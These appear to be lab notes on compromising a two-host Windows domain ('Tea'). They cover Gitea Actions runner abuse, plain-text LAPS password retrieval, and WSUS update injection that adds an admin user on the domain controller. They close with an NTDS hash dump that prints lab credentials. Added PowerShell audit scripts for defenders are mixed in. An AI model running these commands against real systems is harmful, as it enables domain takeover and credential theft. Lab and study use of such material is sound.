Tea (Chain)

This is not a writeup, just my notes about the machine.

Machine information

Operating System: Microsoft Windows Server 2022 Standard

Chain: True (2 Machines)

Credentials

Username | Password | Method | Scope

✅ Valid Usernames

🔑 Passwords list

Information Gathering

Nmap

Nmap scan report for 10.10.187.181
PORT     STATE SERVICE    REASON          VERSION
53/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
593/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Nmap scan report for 10.10.187.182
PORT     STATE SERVICE    REASON          VERSION
80/tcp   open  tcpwrapped syn-ack ttl 127
135/tcp  open  tcpwrapped syn-ack ttl 127
139/tcp  open  tcpwrapped syn-ack ttl 127
445/tcp  open  tcpwrapped syn-ack ttl 127
3389/tcp open  tcpwrapped syn-ack ttl 127
5985/tcp open  tcpwrapped syn-ack ttl 127

Service Enumeration

10.10.187.181

DNS

  • Not vulnerable to DNS Zone Transfer

SMB (enum4linux-ng)

  • Domain SID: S-1-5-21-4071478895-3826761629-2568933575

  • Domain: tea.vl

  • FQDN: DC.tea.vl

  • Server allows null session authentication

  • Parent Domain

  • signing: True (Not vulnerable to NTLM Relay)

10.10.187.182

HTTP:80 (Simple IIS Default Web Site)

HTTP:3000 Gitea

Compromising SRV Server

Signing up for a Gitea account

Discovering a runner in the Gitea instance

Useful doc: hacking-on-gitea-actions

Exploiting Gitea via Runners

Requirements:

  1. Create a new repository

  2. Enable Repository Actions

  3. Upload the following file: .gitea/workflows/filename.yaml

name: Gitea Actions Demo
run-name: Hacking via Gitea Actions 🚀
on: [push]            # every push to the repository triggers the job
jobs:
  Explore-Gitea-Actions:
    runs-on: windows-latest   # label must match a runner registered on the instance
    steps:
      - run: <hoaxshell>      # placeholder kept from the notes: the command the runner executes
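The point of the steps above is that any user who can push a workflow file gets code execution on whatever host the runner is registered on. As an added example that is not part of the original notes or of Gitea itself, the following script is what a Gitea admin would run to find every repository with an Actions workflow and count its inline `run:` steps, so runner exposure can be reviewed. It assumes an admin API token (`$Token`, placeholder) and uses the documented `/api/v1/repos/search` and `/api/v1/repos/{owner}/{repo}/contents/{path}` endpoints; the instance URL is the one from the notes.

```powershell
# Added audit example (not from the notes): list Actions workflows on a Gitea instance.
# Assumptions: $GiteaUrl is the instance, $Token is an admin API token (placeholder).
$GiteaUrl = 'http://10.10.187.182:3000'
$Token    = 'REPLACE_WITH_API_TOKEN'
$Headers  = @{ Authorization = "token $Token" }

# Page through every repository the token can see
$page  = 1
$repos = @()
do {
    $resp   = Invoke-RestMethod -Uri "$GiteaUrl/api/v1/repos/search?limit=50&page=$page" -Headers $Headers
    $repos += $resp.data
    $page++
} while (@($resp.data).Count -eq 50)

foreach ($repo in $repos) {
    $full = $repo.full_name
    try {
        # Directory listing of .gitea/workflows; 404 means no workflows in this repository
        $files = Invoke-RestMethod -Uri "$GiteaUrl/api/v1/repos/$full/contents/.gitea/workflows" `
                                   -Headers $Headers -ErrorAction Stop
    } catch {
        continue
    }
    foreach ($f in @($files)) {
        if ($f.type -ne 'file') { continue }
        # File content comes back base64 encoded
        $content = Invoke-RestMethod -Uri "$GiteaUrl/api/v1/repos/$full/contents/$($f.path)" -Headers $Headers
        $yaml    = [System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($content.content))
        $lines   = $yaml -split "`n"
        # Inline shell steps are the ones to review; the workflow in the notes is exactly one of these
        $runs    = @($lines | Where-Object { $_ -match '^\s*-?\s*run:' })
        [pscustomobject]@{
            Repository = $full
            Workflow   = $f.path
            RunsOn     = (($lines | Where-Object { $_ -match 'runs-on:' }) | ForEach-Object { $_.Trim() }) -join '; '
            InlineRuns = $runs.Count
        }
    }
}
```

The `RunsOn` column is what to compare against the labels of registered runners: a label that resolves to a runner executing directly on a server host, as in these notes, means every repository owner with Actions enabled has a shell on that host.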

Reading LAPS credentials

During enumeration, files were found that indicate LAPS is present on the system.

PS C:\Temp > Get-LapsADPassword -Identity srv -AsPlainText
ComputerName        : SRV
DistinguishedName   : CN=SRV,OU=Servers,DC=tea,DC=vl
Account             : Administrator
Password            : ze4X81s3@GEm%3
PasswordUpdateTime  : 4/23/2025 9:22:32 PM
ExpirationTimestamp : 5/23/2025 9:22:32 PM
Source              : EncryptedPassword
DecryptionStatus    : Success
AuthorizedDecryptor : TEA\Server Administration
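The output above shows the two things a defender cares about in a LAPS deployment: the password age (here a 30-day rotation) and the principal allowed to decrypt it (TEA\Server Administration). As an added example, not taken from the notes or from Microsoft's documentation, the following script audits the Servers OU from the notes: it lists who holds LAPS read rights and reports password age and expiry without printing any secret. It assumes the Windows LAPS module (`Find-LapsADExtendedRights`, `Get-LapsADPassword`) and the ActiveDirectory module are installed and that the caller can read the LAPS metadata attributes; the `ObjectDN` and `ExtendedRightHolders` property names are the documented ones.

```powershell
# Added audit example (not from the notes): review LAPS rights and password freshness.
# Assumption: Windows LAPS and ActiveDirectory modules are available; $OU is from the notes.
$OU = 'OU=Servers,DC=tea,DC=vl'

# 1. Who is allowed to read LAPS passwords below this OU (the notes show TEA\Server Administration)
Find-LapsADExtendedRights -Identity $OU |
    Select-Object ObjectDN, @{ n = 'Holders'; e = { $_.ExtendedRightHolders -join ', ' } } |
    Format-Table -AutoSize

# 2. Password metadata for every computer in the OU; no -AsPlainText, so nothing secret is shown
Get-ADComputer -SearchBase $OU -Filter * | ForEach-Object {
    $laps = Get-LapsADPassword -Identity $_.Name -ErrorAction SilentlyContinue
    [pscustomobject]@{
        Computer        = $_.Name
        Account         = $laps.Account
        PasswordAgeDays = if ($laps) { [int]((Get-Date) - $laps.PasswordUpdateTime).TotalDays } else { $null }
        ExpiresAt       = $laps.ExpirationTimestamp
        Expired         = if ($laps) { $laps.ExpirationTimestamp -lt (Get-Date) } else { $null }
        Decryptor       = $laps.AuthorizedDecryptor
    }
} | Format-Table -AutoSize
```

Membership of every group returned in `Holders` is the real access list for these passwords; in this chain, a foothold on SRV as a member of that group was enough to read the Administrator password of SRV itself.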

Compromising Domain Controller DC.TEA.VL

Inspecting WSUS on the computer

Tool: SharpWSUS (Recommended Version)

C:\Users\Administrator\Desktop>.\SharpWSUS.exe inspect

 ____  _                   __        ______  _   _ ____
/ ___|| |__   __ _ _ __ _ _\ \      / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
 ___) | | | | (_| | |  | |_) \ V  V /  ___) | |_| |___) |
|____/|_| |_|\__,_|_|  | .__/ \_/\_/  |____/ \___/|____/
                       |_|
           Phil Keeble @ Nettitude Red Team

[*] Action: Inspect WSUS Server
C:\WSUS-Updates\WsusContent

################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
SRV, 8530, C:\WSUS-Updates\WsusContent


####################### Computer Enumeration #######################
ComputerName, IPAddress, OSVersion, LastCheckInTime
---------------------------------------------------
dc.tea.vl, 10.10.170.85, 10.0.20348.2031, 4/24/2025 6:18:30 AM

####################### Downstream Server Enumeration #######################
ComputerName, OSVersion, LastCheckInTime
---------------------------------------------------

####################### Group Enumeration #######################
GroupName
---------------------------------------------------
All Computers
Downstream Servers
Unassigned Computers

[*] Inspect complete


C:\Users\Administrator\Desktop>

Abusing Windows Server Update Services (WSUS)

C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \" net user Intrusionz3r0 P@assword123 /add \"" /title:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Creating User"
C:\Users\Administrator\Desktop> SharpWSUS.exe create /payload:"C:\_install\PsExec64.exe" /args:"-accepteula -s -d cmd.exe  /c \"net localgroup administrators Intrusionz3r0 /add \"" /title:"Adding to Admin"
C:\Users\Administrator\Desktop> SharpWSUS.exe approve /updateid:ebe6db84-afe1-46f0-94a0-6741da7d000f /computername:dc.tea.vl /groupname:"Adding to Admin"
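The inspect output above shows why this works: the WSUS server listens on 8530, the default non-TLS port, and the DC trusts whatever it approves. As an added example, not from the notes or from SharpWSUS, the following script is the client-side check to run on a WSUS client such as the DC: it reads the Windows Update policy keys to report whether updates arrive over plain HTTP, and lists recent Windows Update client events so update titles can be reviewed. The registry paths and the event log name are the standard ones; the `HasKB` column is a heuristic I am assuming here, not a Microsoft field.

```powershell
# Added defensive check (not from the notes): run on a WSUS client, e.g. the DC.
$Policy = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate'
$wu = Get-ItemProperty -Path $Policy        -ErrorAction SilentlyContinue
$au = Get-ItemProperty -Path "$Policy\AU"   -ErrorAction SilentlyContinue

# 1. Transport: an http:// WUServer is the precondition for the update injection above
if (-not $wu -or -not $wu.WUServer) {
    'No WSUS server configured by policy; client uses Microsoft Update.'
} elseif ($au.UseWUServer -ne 1) {
    "WUServer is $($wu.WUServer) but UseWUServer is not 1, so it is not in effect."
} elseif ($wu.WUServer -match '^https://') {
    "OK: WSUS over TLS: $($wu.WUServer)"
} else {
    "RISK: WSUS over plain HTTP: $($wu.WUServer) (8530 is the default non-TLS port)"
}

# 2. Recent update client activity; titles like "Creating User" in the notes would stand out
#    HasKB is a heuristic (assumption): Microsoft updates normally carry a KB number in the title
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-WindowsUpdateClient/Operational' } `
             -MaxEvents 200 -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'install' } |
    Select-Object TimeCreated, Id,
                  @{ n = 'Message'; e = { $_.Message } },
                  @{ n = 'HasKB';   e = { $_.Message -match 'KB\d{6,7}' } } |
    Format-Table -AutoSize -Wrap
```

Moving WSUS to HTTPS (port 8531 with a trusted certificate) removes the ability to inject updates from the network path; it does not help against someone who already administers the WSUS server itself, which is the position reached in these notes, so access to the WSUS host and its approval rights needs the same scrutiny as the DC.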

Dumping Administrator NT hash

 nxc smb 10.10.170.85 -u 'Intrusionz3r0' -p 'P@assword123'  --ntds --user Administrator
SMB         10.10.170.85    445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:tea.vl) (signing:True) (SMBv1:False)
SMB         10.10.170.85    445    DC               [+] tea.vl\Intrusionz3r0:P@assword123 (Pwn3d!)
SMB         10.10.170.85    445    DC               [+] Dumping the NTDS, this could take a while so go grab a redbull...
SMB         10.10.170.85    445    DC               Administrator:500:aad3b435b51404eeaad3b435b51404ee:c98bef04d073b4607daee561364ff612:::
